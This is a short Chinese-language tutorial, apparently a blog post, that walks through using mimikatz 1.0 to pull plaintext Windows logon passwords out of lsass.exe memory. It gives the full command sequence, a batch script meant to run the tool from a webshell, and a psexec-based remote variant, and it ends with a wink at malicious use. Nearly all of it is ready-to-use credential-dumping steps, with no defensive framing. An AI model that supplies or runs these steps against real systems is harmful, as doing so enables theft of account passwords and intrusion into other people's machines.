使用神器mimikatz获取当前系统密码

mimikatz,小名“咪咪卡住”,是来自法国的一款调试器,但是为什么称它为神器呢?因为作者写的一个dll可以帮助我们获取系统的登陆密码。目前测试从WinXP至Win7再从Win2003至Win2008全部有效。

下载地址就不放了大家自行百度哈,对了貌似只有1.0版本支持这个功能,最新的2.0不支持。解压后有三个文件夹tools、Win32和x64。选择自己对应的系统进入,我这里是x64。

下面我们来开始获取密码~!

注:本机账户是Y,密码是Vkki9191。

用管理员权限运行mimikatz.exe,输入以下代码提升权限

privilege::debug

显示OK后接着输入(要保证sekurlsa.dll和mimikatz.exe在同一目录下)

inject::process lsass.exe sekurlsa.dll

显示一大串字符,只要没出现Error字样就继续

@getLogonPasswords

同样出来一大堆东西,根据Utilisateur principal找到当前账户,wdigest和tspkg后的就是这个账户的密码啦!


###webshell

1
2
3
4
5
6
7
echo privilege::debug >2.txt
echo inject::process lsass.exe %~dp01.dll >>2.txt
echo @getLogonPasswords >>2.txt
echo exit >>2.txt
sleep 1
%~dp01.exe < %~dp02.txt > %~dp01.txt
del 2.txt

###远程终端

1
2
3
4
5
6
psexec.exe -s cmd.exe
绝对路径\mimikatz.exe
privilege::debug
inject::process lsass.exe "绝对路径\sekurlsa.dll"
@getLogonPasswords
exit

快去跟小伙伴热(tu)情(mou)分(bu)享(gui)吧!